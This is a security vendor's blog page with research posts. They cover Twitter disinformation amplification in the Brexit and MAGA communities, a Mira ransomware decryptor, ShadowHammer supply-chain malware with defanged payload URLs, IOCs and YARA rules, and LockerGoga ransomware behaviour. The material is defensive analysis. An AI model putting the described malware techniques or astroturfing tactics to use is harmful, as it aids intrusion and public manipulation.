The latest news and insights from F-Secure

Blog


Our Story

Nobody knows cyber security like F-Secure. For three decades, F-Secure has driven innovations in cyber security, defending tens of thousands of companies and millions of people.

With unsurpassed experience in endpoint protection as well as detection and response, F-Secure shields enterprises and consumers against everything from advanced cyber attacks and data breaches to widespread ransomware infections.

 

About us

For F-Secure, cyber security is more than a product—it's how we see the world.

Read more
 

Careers at F-Secure

Join us if you want to make a difference—in the world, for us, and for yourself.

Read more
 

For Investors

Growing revenue, healthy profitability, and a strong balance sheet

Read more

Awards and references

Find out why F-Secure has the best protection in the world.

AV-TEST certification for F-Secure SAFE
Digital Citizen Awards — the most innovative antivirus product of 2017
AV-Test Best Protection 2018 PSB Computer Protection
Best SMB Security Product Protection Service for Business
News from the Lab

Discovering Hidden Twitter Amplification

As part of the Horizon 2020 SHERPA project, I’ve been studying adversarial attacks against smart information systems (systems that utilize a combination of big data and machine learning). Social networks fall into this category – they’re powered by recommendation algorithms (often based on machine learning techniques) that process large amounts of data in order to display relevant information to users. As such, I’ve been trying to determine how attackers game these systems. This post is a follow-up to F-Secure’s recent report about brexit-related amplification.

In this article, I’d like to share methodology I’ve been developing to observe “behind the scenes” amplification on Twitter. I will illustrate how I have applied this methodology in an attempt to discover political disinformation around pro-leave brexit topics, and to hopefully further clarify how much overlap exists between accounts promoting far-right ideology in the US, and accounts pushing pro-leave ideology in the UK.

Step 1: Collect a list of candidate accounts

I wrote a simple crawler using the Twitter API. It does the following:

  • Pull a new target account from a queue of targets
  • Gather Twitter user objects of the accounts the target is following
  • For each user object, run a set of string matches and regular expressions against text fields (name, description, screen_name)
    • In this experiment, string searches included things like “yellowvest”, “hate the eu”, “istandwithtommy”, “voted brexit”, “qanon”, and “maga”.
  • Check the list of accounts followed against a pre-compiled list of roughly 500 influencer accounts. This list was collected over several months by hand-visiting Twitter accounts identified through data analysis and manual research.
  • If any of the above matched, add the account name to the queue (if it isn’t already on it, and if we haven’t already queried the account), and save the user object for later processing steps.
  • Also, save a node-edge graph representation of the network, as it is crawled
  • Repeat
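The crawl loop above can be sketched roughly as follows. This is an illustrative reconstruction, not the original crawler: `get_following` is a hypothetical stand-in for the Twitter API call that returns user objects of the accounts a target follows.

```python
import re
from collections import deque

# Keyword/regex matches applied to the name, screen_name, and description fields.
KEYWORDS = ["yellowvest", "hate the eu", "istandwithtommy", "voted brexit", "qanon", "maga"]
PATTERNS = [re.compile(k.replace(" ", r"\s*"), re.IGNORECASE) for k in KEYWORDS]

def is_candidate(user, influencers, followed_threshold=1):
    """True if a user object matches any keyword/regex, or follows
    at least `followed_threshold` accounts from the influencer list."""
    text = " ".join(user.get(f, "") or "" for f in ("name", "screen_name", "description"))
    if any(p.search(text) for p in PATTERNS):
        return True
    return len(set(user.get("following", [])) & influencers) >= followed_threshold

def crawl(seed_accounts, get_following, influencers, max_accounts=1000):
    """Breadth-first crawl. get_following(name) stands in for the Twitter
    friends-list API call and must return user objects (dicts)."""
    queue, queried, saved = deque(seed_accounts), set(), []
    graph = []  # node-edge representation: (target, followed_account)
    while queue and len(queried) < max_accounts:
        target = queue.popleft()
        if target in queried:
            continue
        queried.add(target)
        for user in get_following(target):
            graph.append((target, user["screen_name"]))
            if is_candidate(user, influencers):
                saved.append(user)  # keep user object for later processing
                if user["screen_name"] not in queried:
                    queue.append(user["screen_name"])
    return saved, graph
```

In practice the queue grows faster than it can be consumed, so `max_accounts` (or a time limit) bounds the run.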

The crawler was seeded with a couple of random troll accounts I found while browsing Twitter.

As with any Twitter account crawl, the process never finishes – the length of the queue grows faster than it can be consumed. I ran the crawler for just a couple of days (between April 2nd and 3rd 2019), during which it collected about 260,000 “interesting” Twitter user objects. For this experiment, I filtered the objects into a few different groups:

  • Filtering by account creation date, in order to find recently created accounts. (during, or after March 2019). This yielded a list of just over 2,000 accounts.
  • By filtering on strings in description and name fields, I collected lists of accounts self-associating with Tommy Robinson. This yielded a list of just over 900 accounts.
  • By filtering based on who the accounts were following, I collected a list of accounts that followed at least 10 of the pre-compiled list of influencer accounts. This yielded a list of just over 23,000 accounts.
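The three filters can be sketched like this, assuming user objects shaped like the Twitter API's (with a `following` field standing in for the list of accounts each user follows):

```python
from datetime import datetime, timezone

TWITTER_DATE = "%a %b %d %H:%M:%S %z %Y"  # e.g. "Sat Mar 02 12:00:00 +0000 2019"

def recent_accounts(users, cutoff):
    """Accounts created on or after the cutoff date."""
    return [u for u in users
            if datetime.strptime(u["created_at"], TWITTER_DATE) >= cutoff]

def self_associating(users, needle):
    """Accounts mentioning a string in their name or description fields."""
    needle = needle.lower()
    return [u for u in users
            if needle in (u.get("name", "") + " " + u.get("description", "")).lower()]

def heavy_influencer_followers(users, influencers, minimum=10):
    """Accounts following at least `minimum` of the influencer list."""
    return [u for u in users
            if len(set(u.get("following", [])) & influencers) >= minimum]
```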

Step 2: Observe candidate account behaviour

I wrote a second script that uses the Twitter API’s statuses/filter functionality to follow the activity of a list of candidate accounts collected in the previous step. I ran this script with the first two candidate lists – Twitter’s standard API allows a maximum of 5,000 accounts to be followed in this way. Full tweet objects were pre-processed (abbreviated to include only metadata I was interested in looking at), and written sequentially to disk for later processing. I allowed this script to run for a couple of days (between April 2nd and 3rd 2019), in order to capture a representative sample of the candidate accounts’ activities. I then used Python and Jupyter notebooks to analyze the collected data.
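The pre-processing step can be sketched as follows; the exact fields kept are an assumption for illustration:

```python
import json

# Fields one might keep from a full tweet object; the real selection is an assumption.
KEEP = ("id_str", "created_at", "text", "retweet_count")
USER_KEEP = ("screen_name", "created_at", "followers_count", "friends_count")

def abbreviate(tweet):
    """Strip a full tweet object down to the metadata of interest."""
    slim = {k: tweet.get(k) for k in KEEP}
    slim["user"] = {k: tweet.get("user", {}).get(k) for k in USER_KEEP}
    rt = tweet.get("retweeted_status")
    if rt:  # record who was retweeted, not the full embedded object
        slim["retweeted_user"] = rt.get("user", {}).get("screen_name")
    return slim

def append_jsonl(path, tweet):
    """Write one abbreviated tweet per line for later sequential processing."""
    with open(path, "a", encoding="utf-8") as f:
        f.write(json.dumps(abbreviate(tweet)) + "\n")
```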

Results

The “new accounts” group tweeted about a variety of topics, and retweeted accounts from both the US and UK. Here’s a graph visualization of their activity:

Names in larger fonts indicate accounts that were retweeted more often.

In comparison, the list of “tommy” accounts promoted very samey content, giving rise to this rather awkward visual:

When analyzing the collected data, I immediately noticed that both groups were promoting a few almost brand new accounts. Here’s the most prominent of them – BringUkip. Notice how the account’s pinned tweet doesn’t even spell UKIP party leader Gerard Batten’s name correctly. I suspect this isn’t an official UKIP account.

During the (less than two days) collection period, close to 850 of the 2000 accounts in the “new accounts” group retweeted BringUkip almost 1800 times. In that same time span, over 600 of the approximately 900 accounts in the “tommy” group retweeted BringUkip close to 1000 times.

Here are some of the other brand new accounts being amplified by the “new accounts” group:

Some really surprising phenomena can be observed in the above chart. For instance, Fish_171, an account that was created on March 2nd 2019 (almost exactly a month ago) has over 12,000 followers (and follows almost 11,000 accounts). WillOfThePpl11, an account that was created on March 16th 2019 (about two weeks ago at time of writing) has published over 10,000 Tweets.

Here’s a similar chart, but for the “tommy” group. Not as much new account amplification was being done by those accounts:

Here are a few of the other new accounts being promoted by these groups. Red26478680 was created on March 30th 2019 (4 days ago at time of writing).

I happened to spot this account while browsing Twitter on my way into work this morning. It was promoting itself in a reply to Breaking911 (one of the accounts on my list of influencers):

Another hotly promoted account is HomeRuleNow, an account that was created on March 29th 2019 (5 days ago).

This account self-identifies with #Bluehand – a group that Twitter appears to have been actively clamping down on. This account accrued over 1000 followers in the five days since it was created.

Here’s one more – AGirlToOne:

This account was created on March 23rd 2019 (just over a week ago). It was retweeted by over 1000 of the approximately 2000 “new accounts” users during the collection period.

While browsing through a random selection of timelines in the “new accounts” group, I found some interesting things. Here is a tweet from one of the users (ianant4) discussing how to evade Twitter’s detection mechanisms:

I also found eggman25503141:

This account is quite bot-like. All tweets have the same format, starting with “YOU WONT SEE THIS ON #BBCNEWS”, an extra line break, and then a sentence, followed by a few pictures. All of this account’s tweets promote extreme anti-Islamic content. Most of this account’s tweets have received no engagement. Except this one:

The above tweet received, at the time of capture, 48 replies, 374 retweets, and 254 likes. Many of the accounts collected in the first step of my collection process participated in retweeting the above.

For fun, here’s one of the seed accounts used.

The methodology outlined in this article works well due to the fact that the studied demographic uses plenty of self-identifying keywords in their Twitter descriptions. For other subject matter, gathering a candidate list may be more problematic.

Given that the account list I gathered was based on following-follower relationships between Twitter accounts, it is clear that many pro-brexit Twitter accounts and MAGA accounts follow each other. The content these accounts promote is, however, somewhat separate, and dependent on the account’s persona (MAGA versus brexit). Some accounts I looked at promoted both types of content, but they were in the minority. Most of the accounts observed in this research were/are being operated, at least in part, by actual human beings. In between heavily retweeting content, these accounts occasionally publish original tweets, converse with each other, and troll other people. I believe the results of this piece of research strongly prove the existence of a well-organized and potentially large network of individuals that are creating and operating multiple Twitter accounts in order to purposefully promote political content directly under our noses.



Mira Ransomware Decryptor

We investigated a recent piece of ransomware called Mira (Trojan:W32/Ransomware.AN) in order to check whether it is feasible to decrypt the encrypted files.

Decryption is often very challenging because the keys needed for decryption are missing. In the case of Mira ransomware, however, all the information required to decrypt an encrypted file is appended to the encrypted file itself.

Encryption Process

The ransomware first initializes a new instance of the Rfc2898DeriveBytes class to generate a key. This class takes a password, salt, and iteration count.

The password is generated using the following information:

  • Machine name
  • OS Version
  • Number of processors
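Since Rfc2898DeriveBytes implements PBKDF2 with HMAC-SHA1, the same key can be reproduced outside .NET once the inputs are known. A sketch in Python – how the three values are concatenated into the password string is an assumption for illustration, and the salt argument comes from the RNG described next:

```python
import hashlib

def derive_key(machine_name, os_version, processor_count, salt,
               iterations=20, key_len=32):
    """Reproduce an Rfc2898DeriveBytes (PBKDF2-HMAC-SHA1) key derivation.
    The exact password-string format is a hypothetical placeholder."""
    password = f"{machine_name}{os_version}{processor_count}".encode("utf-8")
    return hashlib.pbkdf2_hmac("sha1", password, salt, iterations, dklen=key_len)
```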

The salt, on the other hand, is generated by a Random Number Generator (RNG):

The ransomware then proceeds to use the Rijndael algorithm to encrypt files:

After encryption, it appends a “header” structure to the end of the file.

This header conveniently contains the salt and the password hash. In addition to that, the iteration count is hard-coded into the sample, in this case, the value was 20.

By retrieving the password, salt, and the iteration count from the ransomware itself, we were able to obtain all the information needed to create a decryption tool for the encrypted files.
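A decryptor only needs to read those values back out of the file; with the salt recovered, the password regenerated from machine information, and the hard-coded iteration count, PBKDF2 yields the key. Here is a sketch of parsing such an appended structure – the field order and length-prefixed layout are hypothetical, for illustration only:

```python
import struct

# Hypothetical trailer layout for illustration (NOT the malware's real header):
# [salt_len:4][salt][hash_len:4][password_hash], appended at the end of the file.

def read_trailer(data):
    """Parse the appended header back out of a trailer byte string,
    assuming the length-prefixed layout above."""
    off = 0
    salt_len, = struct.unpack_from("<I", data, off); off += 4
    salt = data[off:off + salt_len]; off += salt_len
    hash_len, = struct.unpack_from("<I", data, off); off += 4
    pwd_hash = data[off:off + hash_len]
    return salt, pwd_hash
```

In a real tool the trailer would first be located relative to the end of the encrypted file.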

Decryption tool

You can download our decryption tool from here.

Here’s a video of how you can use our tool:

 



A Hammer Lurking In The Shadows

And then there was ShadowHammer, the supply chain attack on the ASUS Live Update Utility between June and November 2018, which was discovered by Kaspersky earlier this year, and made public a few days ago.

In short, this is how the trojanized Setup.exe works:

  1. An executable embedded in the Resources section has been overwritten by the first-stage payload.
  2. The program logic has been modified in such a way that instead of installing a software update, it executes a payload implemented as a shellcode.
  3. The payload enumerates the MAC addresses on the victim’s system, creates MD5 hashes of them and searches these hashes in a large array of hardcoded values.
  4. If there is a match, it downloads hxxps://asushotfix.com/logo.jpg or hxxps://asushotfix.com/logo2.jpg, depending on the payload variant. This is meant to be a second-stage x86 shellcode since it will try to execute it within its own process. However, these URLs are not accessible anymore.
  5. If there is no match, it creates or updates a file “idx.ini”. (Added in July 2018 – more details below)
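Step 3’s matching logic amounts to MD5-hashing each MAC address and testing set membership. A sketch – how the payload formats the MAC string before hashing is an assumption, and the target set here contains only an example entry:

```python
import hashlib

# Example target set built with an assumed normalization (lowercase hex,
# no separators); the real payload carries hundreds of hardcoded hashes.
TARGET_HASHES = {hashlib.md5(b"0c5b8f279a64").hexdigest()}

def mac_is_targeted(mac):
    """Normalize a MAC address and test its MD5 against the hardcoded set."""
    normalized = mac.lower().replace(":", "").replace("-", "")
    return hashlib.md5(normalized.encode()).hexdigest() in TARGET_HASHES
```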

If you’re more interested in the technical details, our colleagues at Countercept have made an excellent write-up here.

More researchers jumped on this threat and wrote their own analysis as well, such as here and here.

In this post we will focus more on the differences between the variants we have discovered, and how the payload evolved over time. We will also cover some findings about the MAC addresses.

Timeline

  1. June 2018: The beginning.

    In the first known versions, the embedded executable in the Setup.exe resource section has been partially overwritten by another smaller executable that contains the shellcode.
    The executable is not encrypted, and has a PDB string which is remarkable to say the least:

    D:\C++\AsusShellCode\Release\AsusShellCode.pdb

    The number of targeted MAC address hashes was very low. In the earliest sample we found, there were only 18 devices in scope.

    If there is a match, the shellcode will download the file from the following URL and execute it.

     hxxps://asushotfix.com/logo.jpg
  2. Early July 2018: Introduction of the INI file.

    Some interesting functionality was added. If there is NO match with any of the targeted MAC addresses (which will be the case for most devices), the payload will create or update an INI file “idx.ini”. Three different entries are written with a date value corresponding to 7 days/one week later. Example content if it was created today (2019-03-29):

    [IDX_FILE]
    XXX_IDN=2019-04-05
    XXX_IDE=2019-04-05
    XXX_IDX=2019-04-05

    The INI file is stored 2 levels up in the directory structure from where setup.exe is stored.

    So if the executable path is

    C:\Program Files (x86)\ASUS\ASUS Live Update\Temp\6\Setup.exe

    then the INI file will be dropped as

    C:\Program Files (x86)\ASUS\ASUS Live Update\idx.ini

    More MAC hashes were added per iteration, increasing the number to over 200 in a sample compiled on 23 July 2018.

  3. Mid August 2018: Going stealthy.

    Then there is a hiatus of a few weeks. Most people were enjoying summer at that time, but it looks like these actors spent that period on rewriting a few things to hide their payload better. The malicious payload is now fully encrypted, and has become real shellcode, i.e. not part of an executable image. Consequently, the PDB string is gone, and there is no compilation timestamp anymore, which makes determining the exact date of creation trickier. From here on, we are resorting to the date of first seen. The list of targets grew again, to nearly 300 devices.
  4. Early September 2018: A new URL.

    A small but interesting change was that the URL changed to

    hxxps://asushotfix.com/logo2.jpg

    Also, a few more hashes were added, totaling 307 entries, the largest number we have encountered.

  5. Late September 2018: Revisiting the targets.

    Until now, the evolution of the targeted MAC addresses was very consistent: the actors had only added targets. In other words, an older sample always contained a subset of a newer sample. Things changed during the final period of the attack, which lasted for more than a month. The number of hashes started fluctuating – with each new variant, some were removed, while new ones were added. Perhaps the threat actors managed to come up with a shortlist of targets of interest this time?
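The idx.ini behaviour introduced in the July 2018 variant can be sketched as follows, using the example values above (the path is computed two directory levels above the folder holding Setup.exe, and each entry is dated one week out):

```python
import ntpath
from datetime import date, timedelta

def ini_path(exe_path):
    """idx.ini lands two directory levels above the folder holding Setup.exe."""
    folder = ntpath.dirname(exe_path)  # e.g. ...\ASUS Live Update\Temp\6
    return ntpath.join(ntpath.dirname(ntpath.dirname(folder)), "idx.ini")

def ini_content(today):
    """Three entries, each carrying a date one week in the future."""
    stamp = (today + timedelta(days=7)).isoformat()
    return ("[IDX_FILE]\n"
            f"XXX_IDN={stamp}\n"
            f"XXX_IDE={stamp}\n"
            f"XXX_IDX={stamp}\n")
```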

MAC Addresses Observations

Looking at the list of MAC addresses, it appears that some of them are wireless adapters from different manufacturers. It’s possible that the attackers gathered these by listening on a wireless network. Also, it suggests that the targets are mostly laptops as most of the wireless adapters seem to be Intel / Azurewave / Liteon.

As the chart above shows, there were six MAC addresses that didn’t resolve to any vendor:

00ff5eXXXXXX
00ff91XXXXXX
00ffaaXXXXXX
00ffd9XXXXXX
0c5b8f279a64
fa94c2XXXXXX


0c:5b:8f:27:9a:64, which was found in 8 samples, appears to be a Huawei wireless chip address. It is not assigned to Huawei, but looks like it’s being used in Huawei E3372 devices, a 4G USB stick. This particular MAC address is always checked along with a specific Asustek Computer Inc. MAC address.

00ff5eXXXXXX is always checked along with a VMWare MAC address, which suggests that this MAC address is used in virtualized environments.

In the most recent sample, there were a total of 18 devices of interest. Here are the vendor pairs that were checked together as matches:

  • Hon Hai Precision Ind. Co.,ltd. and Vmware, Inc.
  • Azurewave Technology Inc. and Asustek Computer Inc.
  • Intel Corporate and Asustek Computer Inc.
  • Vmware, Inc. and the 00ff5eXXXXXX MAC address

Indicators of Compromise

Hashes

SHA1                                     | DATE (COMPILATION TIMESTAMP/FIRST SEEN) | # OF HARDCODED MAC ADDRESSES | # OF TARGETED DEVICES
b0416f8866954196175d7d9a93b9ab505e96712c | 2018-06-12 | 24  | 18
5039ff974a81caf331e24eea0f2b33579b00d854 | 2018-06-28 | 69  | 50
e01c1047001206c52c87b8197d772db2a1d3b7b4 | 2018-07-10 | 75  | 55
c6bd8969513b2373eafec9995e31b242753119f2 | 2018-07-16 | 156 | 117
2c591802d8741d6aef1a278b9aca06952f035b8f | 2018-07-17 | 197 | 152
0595e34841bb3562d2c30a1b22ebf20d31c3be86 | 2018-07-23 | 294 | 208
df4df416c819feb06e4d206ea1ee4c8d07c694ad | 2018-08-13 | 404 | 287
8e0dfaf40174322396800516b282bf16f62267fa | 2018-09-05 | 433 | 307
4a8d9a9ca776aaaefd7f6b3ab385dbcfcbf2dfff | 2018-09-25 | 141 | 86
e793c89ecf7ee1207e79421e137280ae1b377171 | 2018-09-30 | 75  | 41
9f0dbf2ba3b237ff5fd4213b65795595c513e8fa | 2018-10-12 | 22  | 15
e005c58331eb7db04782fdf9089111979ce1406f | 2018-10-19 | 24  | 18


YARA Rules

// older samples - check the PDB string in the shellcode
rule shadowhammer_pdb
{
    strings:
        $str_pdb = "AsusShellCode.pdb" ascii nocase
    condition:
        all of them
}
 
// newer samples - check manual patches in the setup.exe
 
rule shadowhammer_patch
{
    strings:
        $str_msi  = "\\419.msi" ascii wide nocase
        $str_upd = "ASUS Live Updata" ascii wide nocase
        $str_ins = "Asusaller Application" ascii wide nocase
    condition:
        2 of them
}


Analysis of LockerGoga Ransomware

We recently observed a new ransomware variant (which our products detect as Trojan.TR/LockerGoga.qnfzd) circulating in the wild. In this post, we’ll provide some technical details of the new variant’s functionalities, as well as some Indicators of Compromise (IOCs).

Overview

Compared to other ransomware variants that use Windows’ CRT library functions, this new variant relies heavily on the less commonly used Boost library. For example, instead of the CRT’s rename function, it uses boost::filesystem::rename. The change makes technical analysis more difficult for researchers, as it makes function identification harder.

The functionalities for file enumeration and file encryption are split into different processes. File path sharing happens using the Boost.Interprocess library, which makes it harder to analyze the processes separately.

File encryption

If we execute the sample without any arguments, it moves the executable to the %TEMP% directory with the hard-coded name “tgytutrc{number}.exe” and executes it with the “-m” argument (where “m” stands for “master process”):

As we can see on the screenshot, the main executable uses functions from Boost library to copy and execute the sample.

The main functionality is inside the “master” process: it enumerates files on the infected system and executes child processes to encrypt them.

If we provide the additional argument “-l”, the process will create a “C:\\.log.txt” file and write file paths and error messages to it.

To parse command line arguments, the sample uses Boost.Program_options library (ref. screenshot below)

Before starting the encryption phase, the “master” process enumerates sessions and logs off from all but the current process’s session.

The process uses ProcessIdToSessionId function to get a session associated with the current process.

This is a list of active sessions on a test machine. Since session “1” is the session of the current process, it logs off only session “0”:

After that, the “master” process changes the password for all administrator accounts to “HuHuHUHoHo283283@dJD“.

I’ve created a standard user, but it only changes the password for administrator accounts:

The “master” process creates a “shared memory” using the Boost.Interprocess library and executes child processes (in the same executable) with the argument “-i SM-tgytutrc -s”, where “-i ” specifies a shared section name and “-s” stands for “slave”.

According to Wikipedia: “shared memory is memory that may be simultaneously accessed by multiple programs with an intent to provide communication among them or avoid redundant copies”.

On the screenshot, we see that, after changing passwords, it uses Boost library to initialize shared memory and execute child processes (“slave” processes):

Next, the “master” process enumerates files and writes their paths (encoded with Base64) in the shared memory.

The process uses Boost::Filesystem library to query paths, files, and directories:

File paths are encoded with Base64:

Child processes decode the data from the shared memory.
The data on the shared memory has the following structure: The first “DWORD” represents the file index, while the second one represents the size of the “base64” encoded data:

After decoding a file path, a child process generates a key/IV pair using the Crypto++ library.

The “OS_RNG” function uses the CryptGenRandom function from Windows; another function from the Crypto++ library is used to generate the random numbers:

Before the encryption, a “slave” process renames a file using Boost::Filesystem::rename function:

Next, the child process encrypts the file’s content using the Rijndael algorithm. It also appends the generated key/IV pair in an encrypted form to the end of the file. The key/IV pair is encrypted with the public key, which is embedded in the executable:

After it encrypts a file, a child process overwrites the first byte of the encoded data in shared memory with a “0” byte.

Network changes

After the encryption phase, the “master” process enumerates all network interfaces and disables them.

List of active adapters on my test machine:

The “master” process disables them one by one:

Next, it deletes the executable via a “.bat” file, which contains commands to delete both the executable and the bat file itself.

At the end it logs off the current process’s session:

Conclusion

Overall, the latest variant of the LockerGoga ransomware is not especially complex. However, because it uses the Boost and Crypto++ libraries instead of the more common CRT library functions, it is a bit more troublesome for a threat researcher to analyze the sample.

Indicators of compromise (IOCs)

SHA256:

  • C97d9bbc80b573bdeeda3812f4d00e5183493dd0d5805e2508728f65977dda15

Hard coded mutexes:

  • MX-tgytutrc

Path of the malicious executable:

  • %APPDATA%\Local\Temp\tgytutrc8.exe


Analysis Of Brexit-Centric Twitter Activity

This is a rather long blog post, so we’ve created a PDF for you to download, if you’d like to read it offline. You can download that from here.

Executive Summary

This report explores Brexit-related Twitter activity occurring between December 4, 2018 and February 13, 2019. Using the standard Twitter API, researchers collected approximately 24 million tweets that matched the word “brexit” published by 1.65 million users.

A node-edge graph created from the collected data was used to delineate pro-leave and pro-remain communities active on Twitter during the collection period. Using these graphs, researchers were able to identify accounts on both sides of the debate that play influential roles in shaping the Brexit conversation on Twitter. A subsequent analysis revealed that while both communities exhibited inorganic activity, this activity was far more pronounced in the pro-leave group. Given the degree of abnormal activity observed, the researchers conclude that the pro-leave Twitter community is receiving support from far-right Twitter accounts based outside of the UK. Some of the exceptional behaviors exhibited by the pro-leave community included:

  • The top two influencers in the pro-leave community received a disproportionate number of retweets, as compared to influencer patterns seen in the pro-remain community
  • The pro-leave group relied on support from a handful of non-authoritative news sources
  • A significant number of non-UK accounts were involved in pro-leave conversations and retweet activity
  • Some pro-leave accounts tweeted a mixture of Brexit and non-Brexit issues (specifically #giletsjaunes, and #MAGA)
  • Some pro-leave accounts participated in the agitation of French political issues (#franceprotests)

The scope of this report is too limited to conclusively determine whether or not there is a coordinated astroturfing campaign underway to manipulate the public or political climate surrounding Brexit. However, it does provide a solid foundation for more investigation into the matter.

Introduction

Social networks have come under fire for their inability to prevent the manipulation of news and information by potentially malicious actors. These activities can expose users to a variety of threats.  And recently, the spread of disinformation and factually inaccurate statements to socially engineer popular opinion has become a significant concern to the public. Of particular concern is the coordination of actions across multiple accounts in order to amplify specific content and fool underlying algorithms into falsely promoting amplified content to users in their news feeds, searches, and recommendations. Participants in these campaigns can include: fully automated accounts (“bots”), cyborgs (accounts that use a combination of manual and automated actions), full-time human operators, and users who inadvertently amplify content due to their beliefs or political affiliations. Architects of sophisticated social engineering campaigns, or astroturfing campaigns (fabricated social network interactions designed to deceive the observer into believing that the activity is part of a grass-roots campaign), sometimes create and operate convincing looking personas to assist in the propagation of content and messages relevant to their cause. It is extremely difficult to distinguish these “fake” personas from real accounts.

Identifying suspicious activities in social networks is becoming more and more difficult. Adversaries have learned from their past experiences, and are now using better tactics, building better automation, and creating much more human-like sock puppets. Social networks now employ more sophisticated algorithms for detecting suspicious activity, and this forces adversaries to develop new techniques aimed at evading those detection algorithms. Services that sell Twitter followers, Twitter retweets, YouTube views, YouTube subscribers, app store reviews, TripAdvisor reviews, Facebook likes, Instagram followers, Instagram likes, Facebook accounts, Twitter accounts, eBay reviews, Amazon ratings, and anything else you could possibly imagine (related to social networks) can be purchased cheaply online. These services can all be found with simple web searches. For the more tech-savvy, a plethora of tools exist for automating the control of multiple social media accounts, for automating the creation and publishing of text and video-based content, for scraping and copying web sites, and for automating search engine optimization tasks.  As such, more complex analysis techniques, and much more in-depth study of the data obtainable from social networks is required than ever before.

Because of its open nature, and fully-featured API support, Twitter is an ideal platform for research into suspicious social network activity. By studying what happens on Twitter, we can gain insight into the techniques adversaries use to “game” the platform’s users and underlying algorithms. The findings from such research can help us build more robust recommendation mechanisms for both current and future social networking platforms.

Background

Between December 4, 2018 and February 13, 2019, we used the standard Twitter API (from Python) to collect Twitter data against the search term “brexit”. The collected data was written to disk and then subsequently analyzed (using primarily Python and Jupyter notebooks) in order to search for suspicious activity such as disinformation campaigns, astroturfing, sentiment amplification, or other “meddling” operations.
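The collection side of this can be sketched as a simple loop over API result pages. This is an illustrative reconstruction, not the original collection script; `search_page` stands in for one page of results from the standard search API, and deduplication by tweet ID handles the overlap that repeated polling returns:

```python
import json

def collect(search_page, out_path, seen=None):
    """Append newly seen tweets from one API result page to a JSON-lines
    file on disk, skipping IDs already collected by earlier polls."""
    seen = set() if seen is None else seen
    new = 0
    with open(out_path, "a", encoding="utf-8") as f:
        for tweet in search_page:
            tid = tweet["id_str"]
            if tid in seen:
                continue
            seen.add(tid)
            f.write(json.dumps(tweet) + "\n")
            new += 1
    return seen, new
```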

At the time of writing, our dataset consisted of approximately 24 million tweets published by over 1.65 million users. 18 million of those were retweets published by 1.5 million users from tweets posted by 300,000 unique users. The dataset included 145,000 different hashtags, 412,000 different URLs and 700,000 unique tweets.

Suspicious activity (activity that appears inorganic or unnatural) can be difficult to separate from organic activity on a social network. For instance, a tweet from a user with very few followers will normally fall on deaf ears. However, that user may once in a lifetime post something that ends up going “viral” because it was so catchy it got shared by other users, and eventually by influencers with many followers. Malicious actors can amplify a tweet to similar effect by instructing or coordinating a large number of accounts to share an equally unknown user’s tweet. This can be achieved via bots or manually operated accounts (such as what was achieved by Tweetdeckers in 2017 and 2018). Retweets can also be purchased online. Vendors that provide such services publish the purchased retweets from their own fleets of Twitter accounts, which likely don’t participate in any other related conversations on the platform. Retweets purchased in this way are often published over a period of time (and not all at once, since that would arouse suspicion). Hence, detecting that a tweet has been amplified by such a service (and identifying the accounts that participated in the amplification) is only possible if those retweets are captured as they are published. Finding a small group of users that retweeted one account over several days, and that may have themselves appeared only once in a dataset containing over 20 million tweets and 300,000 users, is rather difficult.

Groups of accounts that heavily retweet similar content or users over and over can be indicative of automation or malicious behaviour, but finding such groups can sometimes be tricky. Nowadays sophisticated bot automation exists that can easily hide the usual tell-tale signs of artificial amplification. Automation can be used to queue a list of tweets to be published or retweeted, randomly select a portion of potentially thousands of slave accounts, and perform actions at random times, while specifically avoiding tweeting at certain times of the day to give the impression that real users are in control of those accounts. Real tweets and tweets from “share” buttons on news sites can be mixed with retweets to improve realism.
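One simple way to surface such groups is to count repeated (retweeter, retweeted) pairs in the captured stream. A sketch, assuming abbreviated tweet records with hypothetical `user` and `retweeted_user` fields:

```python
from collections import Counter, defaultdict

def amplification_pairs(tweets):
    """Count how often each (retweeter, retweeted) pair occurs; unusually
    high counts point at accounts amplifying the same targets."""
    pairs = Counter()
    for t in tweets:
        rt = t.get("retweeted_user")
        if rt:
            pairs[(t["user"], rt)] += 1
    return pairs

def heavy_amplifiers(pairs, threshold=3):
    """Group retweeters by target, keeping only targets hit repeatedly."""
    groups = defaultdict(set)
    for (retweeter, target), count in pairs.items():
        if count >= threshold:
            groups[target].add(retweeter)
    return dict(groups)
```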

Another approach to finding suspicious behaviour on Twitter is to search for account activity patterns indicative of automation. In a vacuum, these patterns cannot be used to conclusively determine whether an account is automated, or designed to act as part of an astroturfing or disinformation campaign. However, identifying accounts with one or more suspicious traits can help lead researchers to other accounts, or suspicious phenomena, which may ultimately lead to finding evidence of foul-play. Here are some traits that may indicate suspiciousness:

  • While it is entirely possible for a bored human to tweet hundreds of times per day (especially when most of the activity is pressing the retweet button), accounts with high tweet volumes can sometimes be indicative of automation. In fact, some of the accounts we found during this research that tweeted at high volume tended to publish hundreds of tweets at certain times during the day, whilst remaining dormant the rest of the time, or published tweets at a uniform volume, with no pauses for sleep.
  • Accounts that are just a few days or weeks old tend to not have thousands of followers, unless they belong to a well-known celebrity who just joined the platform. New accounts that develop huge followings in a short period of time are suspicious, unless those followings can be explained by particular activity or some sort of pre-existing public status.
  • Accounts with a similar number of followers and friends can occasionally be suspicious. For instance, accounts controlled by a bot herder are sometimes programmatically instructed to follow each other, and end up having similar follower/friends counts. However, mechanisms also exist that promote a “follow-back” culture on Twitter. These mechanisms are often present in isolated communities, such as the far-right Twittersphere. Commercial services also exist that automate follow-back actions for accounts that followed them. The fact that the list of accounts followed by a user is very similar to that user’s list of friends can, unfortunately, be indicative of any of the above.
  • Accounts that follow thousands of other accounts, but are themselves followed by only a fraction of that number can occasionally be indicative of automation. Automated accounts that advertise adult services (such as porn, phone sex, “friend finders”, etc.) use this tactic to attract followers. However, there are also certain communities on Twitter that tend to reciprocate follows, and hence following a great deal of accounts (including “egg” accounts) is a way of “fishing” for follow-backs, and normal in those circles.
  • While it is true that many users on Twitter tend to like and retweet content a lot more than they write their own tweets, accounts that retweet more than 99% of the time might be controlled by automation (especially since it’s a very easy thing to automate, and can be used to boost the engagement of specific content). A few accounts that we encountered during our research had one pinned tweet published by “Twitter Web Client” whilst the rest of the account’s tweets were retweets published by “Twitter for Android”. This sort of pattern raises suspicion, since it could indicate that the account was manually created (and seeded with a single hand-written tweet) by a user at a computer, and then subsequently automated.
  • Accounts that publish tweets using apps created with the Twitter API, or from sources that are often associated with automation are not conclusively suspicious, but may warrant further examination. This is covered more extensively later in the article.
  • Temporal analysis techniques (discussed later in this article) can reveal robot-like behaviour indicative of automation. Some accounts are automated by design (e.g. automated marketing accounts, news feeds). However, if an account behaves in an automated fashion, and publishes politically polarizing content, it may be cause for suspicion.
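
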